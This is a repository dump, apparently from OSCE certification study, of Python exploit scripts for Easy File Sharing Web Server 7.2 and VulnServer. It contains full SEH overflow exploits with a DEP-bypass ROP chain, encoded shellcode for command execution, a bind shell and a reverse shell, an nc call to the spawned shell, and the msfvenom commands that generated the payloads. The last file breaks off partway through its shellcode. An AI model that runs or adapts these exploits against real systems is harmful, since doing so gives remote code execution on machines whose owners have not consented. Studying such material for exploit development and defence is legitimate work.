Structured Exception Handler (SEH) overwrite exploit found while studying about ZIP file headers. See the link [EDB-ID: 44828](https://www.exploit-db.com/exploits/44828/)
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Local%20Buffer%20Overflow/Zip-n-Gov4.9/PoC.gif">
</p>
================================================
FILE: README.md
================================================
# OSCE
Some of the sploits and tools made during my joruney to take on OSCE. Mostly useless..
<p align="center">
<img height=500 width=900 src="https://media.giphy.com/media/Uno27COfoYlH2/giphy.gif">
</p>
<p align="center">
With persistence and patience comes success
</p>
================================================
FILE: Remote Buffer Overflow/EasyFileSharingWebServerv7.2/Exploit.py
================================================
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------#
# Exploit Title : Easy File Sharing Web Server 7.2 - 'UserID' Remote Buffer Overflow (DEP Bypass) #
# Date : 04/24/2018 #
# Exploit Author : Hashim Jawad #
# Twitter : @ihack4falafel #
# Author Website : ihack4falafel[.]com #
# Vendor Homepage : http://www.sharing-file.com/ #
# Software Link : http://www.sharing-file.com/efssetup.exe #
# Original Exploit: https://www.exploit-db.com/exploits/44485/ #
# Tested on : Windows 7 Enterprise (x86) - Service Pack 1 #
#---------------------------------------------------------------------------------------------------#
import requests
import struct
import time
host='192.168.80.148'
port='80'
# badchars = "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e"
# root@kali:~# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
# Payload size: 447 bytes
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
# 4059 bytes to nSEH offset [filler + ROP + shellcode + filler]
buffer = '\x41' * (2647-128) # filler to where ESP will point after stack pivot (see SEH gadget)
# mona.py VirtualProtect() ROP template with few modifications
# ESI = ptr to VirtualProtect()
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c832d0) # ptr to &VirtualProtect() [IAT sqlite3.dll]
buffer += struct.pack('<L', 0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c18d81) # XCHG EAX,EDI # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x1001d626) # XOR ESI,ESI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x10021a3e) # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
# EBP = ReturnTo (ptr to jmp esp)
buffer += struct.pack('<L', 0x1001add7) # POP EBP # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c24169) # & push esp # ret [sqlite3.dll]
# EDX = NewProtect (0x40)
buffer += struct.pack('<L', 0x10022c4c) # XOR EDX,EDX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
buffer += struct.pack('<L', 0x61c059a0) # INC EDX # ADD AL,0C9 # RETN [sqlite3.dll]
# ECX = lpOldProtect (ptr to W address)
buffer += struct.pack('<L', 0x1001b377) # POP ECX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EBX = dwSize (0x00000501)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0xfffffaff) # will become 0x00000501 after negate
buffer += struct.pack('<L', 0x100231d1) # NEG EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001da09) # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x61c730ad) # &Writable location [sqlite3.dll]
# EDI = ROP NOP (RETN)
buffer += struct.pack('<L', 0x10019f47) # POP EDI # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x1001a858) # RETN (ROP NOP) [ImageLoad.dll]
# EAX = NOP (0x90909090)
buffer += struct.pack('<L', 0x10015442) # POP EAX # RETN [ImageLoad.dll]
buffer += struct.pack('<L', 0x90909090) # nop
buffer += struct.pack('<L', 0x100240c2) # PUSHAD # RETN [ImageLoad.dll]
buffer += "\x90" * 50 # nop
buffer += shellcode # calc.exe
buffer += "\x90" * 50 # nop
buffer += '\x45' * (1412-(4*88)+128-len(shellcode)-100)
buffer += '\x42' * 4 # nSEH filler
# stack pivot that will land somewhere in buffer of As
buffer += struct.pack('<L', 0x10022869) # SEH ADD ESP,1004 # RETN [ImageLoad.dll]
buffer += '\x44' * (5000-4059-4-4)
print "[+] Sending %s bytes of evil payload.." %len(buffer)
time.sleep(1)
try:
cookies = dict(SESSIONID='6771', UserID=buffer,PassWD='')
data=dict(frmLogin='',frmUserName='',frmUserPass='',login='')
requests.post('http://'+host+':'+port+'/forum.ghp',cookies=cookies,data=data)
except:
print "The server stopped responding. You should see calc.exe by now ;D"
================================================
FILE: Remote Buffer Overflow/EasyFileSharingWebServerv7.2/readme.md
================================================
### Easy File Sharing Web Server v7.2
Remote SEH based Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualProtect() API. See the sploit on exploit-db [EDB-ID: 44522](https://www.exploit-db.com/exploits/44522/)
================================================
FILE: Remote Buffer Overflow/VulnServer/Bad Characters/Exploit.py
================================================
import time
import socket
import subprocess
'''
Notes:
======
- Bad characters are everything beyond '\x7f' and obviously '\x00'
- Bad character '\xff' get converted to '\x80' by vulnserver, which will use for the backward jump ;)
- Manual shellcoding is required to jump to the start of shellcode
- Used Slink alphanumeric encoder found in https://github.com/ihack4falafel/Slink, whomever made this tool must be 1337 ;)
'''
#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\x00' -e x86/alpha_mixed BufferRegister=ESI -f python -v shellcode
#Payload size: 710 bytes
shellcode = ""
shellcode += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4b\x32\x77\x70"
shellcode += "\x37\x70\x53\x30\x45\x30\x6d\x59\x59\x75\x70\x31"
shellcode += "\x79\x50\x53\x54\x6e\x6b\x72\x70\x46\x50\x4c\x4b"
shellcode += "\x30\x52\x66\x6c\x4c\x4b\x53\x62\x54\x54\x4c\x4b"
shellcode += "\x50\x72\x67\x58\x76\x6f\x58\x37\x63\x7a\x76\x46"
shellcode += "\x34\x71\x69\x6f\x4e\x4c\x67\x4c\x55\x31\x53\x4c"
shellcode += "\x56\x62\x46\x4c\x75\x70\x4f\x31\x58\x4f\x44\x4d"
shellcode += "\x46\x61\x49\x57\x6a\x42\x78\x72\x33\x62\x72\x77"
shellcode += "\x4e\x6b\x73\x62\x34\x50\x4e\x6b\x43\x7a\x77\x4c"
shellcode += "\x4c\x4b\x32\x6c\x74\x51\x53\x48\x59\x73\x30\x48"
shellcode += "\x63\x31\x4b\x61\x52\x71\x4c\x4b\x50\x59\x61\x30"
shellcode += "\x66\x61\x7a\x73\x6c\x4b\x50\x49\x65\x48\x38\x63"
shellcode += "\x57\x4a\x63\x79\x4e\x6b\x64\x74\x6e\x6b\x73\x31"
shellcode += "\x68\x56\x45\x61\x49\x6f\x6c\x6c\x5a\x61\x78\x4f"
shellcode += "\x46\x6d\x37\x71\x69\x57\x75\x68\x4d\x30\x63\x45"
shellcode += "\x69\x66\x33\x33\x31\x6d\x49\x68\x67\x4b\x43\x4d"
shellcode += "\x35\x74\x44\x35\x48\x64\x52\x78\x6c\x4b\x56\x38"
shellcode += "\x34\x64\x57\x71\x4e\x33\x65\x36\x6e\x6b\x36\x6c"
shellcode += "\x32\x6b\x6c\x4b\x70\x58\x35\x4c\x53\x31\x5a\x73"
shellcode += "\x6e\x6b\x46\x64\x4c\x4b\x63\x31\x4a\x70\x4f\x79"
shellcode += "\x70\x44\x66\x44\x55\x74\x43\x6b\x43\x6b\x53\x51"
shellcode += "\x31\x49\x31\x4a\x50\x51\x39\x6f\x79\x70\x73\x6f"
shellcode += "\x53\x6f\x62\x7a\x6e\x6b\x32\x32\x48\x6b\x6c\x4d"
shellcode += "\x31\x4d\x50\x68\x76\x53\x57\x42\x63\x30\x63\x30"
shellcode += "\x32\x48\x71\x67\x62\x53\x67\x42\x63\x6f\x32\x74"
shellcode += "\x35\x38\x42\x6c\x52\x57\x64\x66\x34\x47\x79\x6f"
shellcode += "\x38\x55\x58\x38\x6c\x50\x36\x61\x53\x30\x55\x50"
shellcode += "\x66\x49\x58\x44\x32\x74\x36\x30\x55\x38\x35\x79"
shellcode += "\x4d\x50\x42\x4b\x37\x70\x69\x6f\x49\x45\x61\x7a"
shellcode += "\x64\x48\x56\x39\x66\x30\x59\x72\x69\x6d\x71\x50"
shellcode += "\x30\x50\x37\x30\x46\x30\x35\x38\x4b\x5a\x54\x4f"
shellcode += "\x59\x4f\x49\x70\x59\x6f\x7a\x75\x4d\x47\x73\x58"
shellcode += "\x54\x42\x67\x70\x32\x31\x71\x4c\x6c\x49\x79\x76"
shellcode += "\x52\x4a\x44\x50\x32\x76\x72\x77\x72\x48\x59\x52"
shellcode += "\x69\x4b\x67\x47\x31\x77\x39\x6f\x59\x45\x30\x57"
shellcode += "\x73\x58\x78\x37\x6a\x49\x54\x78\x69\x6f\x59\x6f"
shellcode += "\x68\x55\x32\x77\x70\x68\x53\x44\x4a\x4c\x57\x4b"
shellcode += "\x68\x61\x4b\x4f\x4e\x35\x33\x67\x4a\x37\x63\x58"
shellcode += "\x50\x75\x52\x4e\x62\x6d\x51\x71\x79\x6f\x6e\x35"
shellcode += "\x53\x58\x50\x63\x62\x4d\x63\x54\x73\x30\x4f\x79"
shellcode += "\x69\x73\x31\x47\x43\x67\x52\x77\x36\x51\x48\x76"
shellcode += "\x43\x5a\x56\x72\x51\x49\x31\x46\x7a\x42\x6b\x4d"
shellcode += "\x30\x66\x6f\x37\x73\x74\x74\x64\x77\x4c\x56\x61"
shellcode += "\x47\x71\x4e\x6d\x62\x64\x76\x44\x44\x50\x79\x56"
shellcode += "\x63\x30\x32\x64\x61\x44\x42\x70\x66\x36\x31\x46"
shellcode += "\x36\x36\x42\x66\x30\x56\x30\x4e\x70\x56\x53\x66"
shellcode += "\x63\x63\x62\x76\x42\x48\x62\x59\x38\x4c\x67\x4f"
shellcode += "\x6d\x56\x39\x6f\x6a\x75\x6d\x59\x59\x70\x42\x6e"
shellcode += "\x71\x46\x30\x46\x4b\x4f\x34\x70\x75\x38\x76\x68"
shellcode += "\x4c\x47\x67\x6d\x53\x50\x4b\x4f\x7a\x75\x6d\x6b"
shellcode += "\x58\x70\x38\x35\x4d\x72\x43\x66\x35\x38\x6c\x66"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x79\x45\x77\x4c"
shellcode += "\x43\x36\x63\x4c\x46\x6a\x4f\x70\x69\x6b\x4d\x30"
shellcode += "\x71\x65\x54\x45\x4f\x4b\x73\x77\x47\x63\x51\x62"
shellcode += "\x70\x6f\x30\x6a\x33\x30\x66\x33\x69\x6f\x39\x45"
shellcode += "\x41\x41"
buffer = 'LTER /.:/'
buffer += shellcode
buffer += '\x41' * (3495-124-len(shellcode))
buffer += '\x54' # PUSH ESP * point esp to where we want the encoder to dump otherwise bad shellcode
buffer += '\x58' # POP EAX
buffer += '\x05\x55\x11\x11\x11' # ADD EAX,11111155
buffer += '\x05\x55\x11\x11\x11' # ADD EAX,11111155
buffer += '\x2D\x25\x11\x22\x22' # SUB EAX,22221125
buffer += '\x54' # PUSH ESP * save esp to esi before encoder alignement
buffer += '\x5E' # POP ESI
buffer += '\x50' # PUSH EAX
buffer += '\x5c' # pop esp
buffer += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a * after the encoder is done we will end up with the following code
buffer += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235 8BE6 MOV ESP,ESI # restore ESP
buffer += "\x05\x77\x63\x41\x41" ## add eax, 0x41416377 81C6 E5030000 ADD ESI,3E5 # add offset to shellcode form ESP to ESI
buffer += "\x05\x66\x53\x41\x41" ## add eax, 0x41415366 FFE6 JMP ESI # jump to ESI
buffer += "\x05\x55\x63\x41\x41" ## add eax, 0x41416355
buffer += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
buffer += "\x50" ## push eax
buffer += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
buffer += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
buffer += "\x05\x63\x12\x11\x11" ## add eax, 0x11111263
buffer += "\x05\x53\x12\x11\x11" ## add eax, 0x11111253
buffer += "\x05\x62\x12\x11\x11" ## add eax, 0x11111262
buffer += "\x2D\x33\x33\x33\x33" ## sub eax, 0x33333333
buffer += "\x50" ## push eax
buffer += "\x25\x4A\x4D\x4E\x55" ## and eax, 0x554e4d4a
buffer += "\x25\x35\x32\x31\x2A" ## and eax, 0x2a313235
buffer += "\x05\x46\x73\x41\x63" ## add eax, 0x63417346
buffer += "\x05\x45\x73\x40\x63" ## add eax, 0x63407345
buffer += "\x50" ## push eax
buffer += '\x41' * (124-73-31) # backward jump buffer space
buffer += '\x75\xff\x74\xff' # nSEH | jump backwards (always true)
buffer += '\x2b\x17\x50\x62' # SEH | 6250172B pop,pop,retn - clean address
buffer += '\x41' * (5000-9-3495-4-4) # junk
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.15', 9999))
print '[+] Sending %s bytes of evil buffer..' %len(buffer)
s.send(buffer)
time.sleep(5)
subprocess.call(['nc -nv 192.168.0.15 4444'], shell=True)
except Exception as e:
print e
================================================
FILE: Remote Buffer Overflow/VulnServer/Bad Characters/README.md
================================================
Structured Exception Handler overwrite with limited character set and small buffer size.
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Bad%20Characters/PoC.gif">
</p>
================================================
FILE: Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py
================================================
#!/usr/share/python
import struct
import time
import socket
from pwn import *
def BufferOverflow():
# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
shellcode = ""
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
#----------------------------#
# Payload #
#----------------------------#
# buffer = CMD + AAA padding # |---------------------------------------------------------+
# buffer = EIP overwrite # |-------| WinXP SP3 Pro : "\xFF\xE4" | [essfunc.dll] |----|-+
# buffer = NOP sled # |---------------------------------------------------------|-|-+
# buffer = Shellcode # |---------------------------------------------------------|-|-|-+
# buffer = BBB padding # |---------------------------------------------------------|-|-|-|-+
#----------------------------# | | | | |
# | | | | |
buffer = "TRUN ." + "A" * 2006 # <-----------------------------------+ | | | |
buffer += struct.pack('<L', 0x625011af) # <-------------------------------------+ | | |
buffer += "\x90" * 40 # <---------------------------------------+ | |
buffer += shellcode # <-----------------------------------------+ |
buffer += "B" * (3000-6-2006-4-40-len(shellcode)) # <-------------------------------------------+
try:
r = remote('192.168.199.140', 9999)
r.recv(2048)
print "[+] Sending %s bytes evil payload.." %len(buffer)
r.send(buffer)
except:
print "Couldn't connect to target!"
def main():
print (
'''
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
|V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
'''
)
BufferOverflow()
if __name__ == '__main__':
main()
================================================
FILE: Remote Buffer Overflow/VulnServer/Egg Hunter/Exploit.py
================================================
import time
import socket
import subprocess
# root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\x00\x0a\x0d' -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 1 compatible encoders
# Attempting to encode payload with 1 iterations of x86/alpha_mixed
# x86/alpha_mixed succeeded with size 702 (iteration=0)
# x86/alpha_mixed chosen with final size 702
# Payload size: 702 bytes
# Final size of python file: 3768 bytes
shellcode = ""
shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42"
shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
shellcode += "\x42\x75\x4a\x49\x49\x6c\x6a\x48\x4e\x62\x75\x50"
shellcode += "\x57\x70\x73\x30\x31\x70\x4b\x39\x48\x65\x74\x71"
shellcode += "\x59\x50\x55\x34\x4c\x4b\x42\x70\x66\x50\x6c\x4b"
shellcode += "\x53\x62\x76\x6c\x4e\x6b\x53\x62\x46\x74\x6e\x6b"
shellcode += "\x53\x42\x56\x48\x76\x6f\x6c\x77\x72\x6a\x46\x46"
shellcode += "\x36\x51\x39\x6f\x6e\x4c\x47\x4c\x50\x61\x31\x6c"
shellcode += "\x76\x62\x74\x6c\x61\x30\x4f\x31\x38\x4f\x76\x6d"
shellcode += "\x46\x61\x69\x57\x59\x72\x39\x62\x30\x52\x30\x57"
shellcode += "\x4c\x4b\x52\x72\x74\x50\x6e\x6b\x72\x6a\x65\x6c"
shellcode += "\x4c\x4b\x32\x6c\x44\x51\x30\x78\x6d\x33\x52\x68"
shellcode += "\x36\x61\x4a\x71\x52\x71\x4c\x4b\x56\x39\x45\x70"
shellcode += "\x56\x61\x6a\x73\x6c\x4b\x53\x79\x57\x68\x79\x73"
shellcode += "\x37\x4a\x62\x69\x4e\x6b\x75\x64\x4e\x6b\x43\x31"
shellcode += "\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x6a\x61\x48\x4f"
shellcode += "\x54\x4d\x45\x51\x58\x47\x56\x58\x4d\x30\x44\x35"
shellcode += "\x4b\x46\x46\x63\x43\x4d\x68\x78\x77\x4b\x43\x4d"
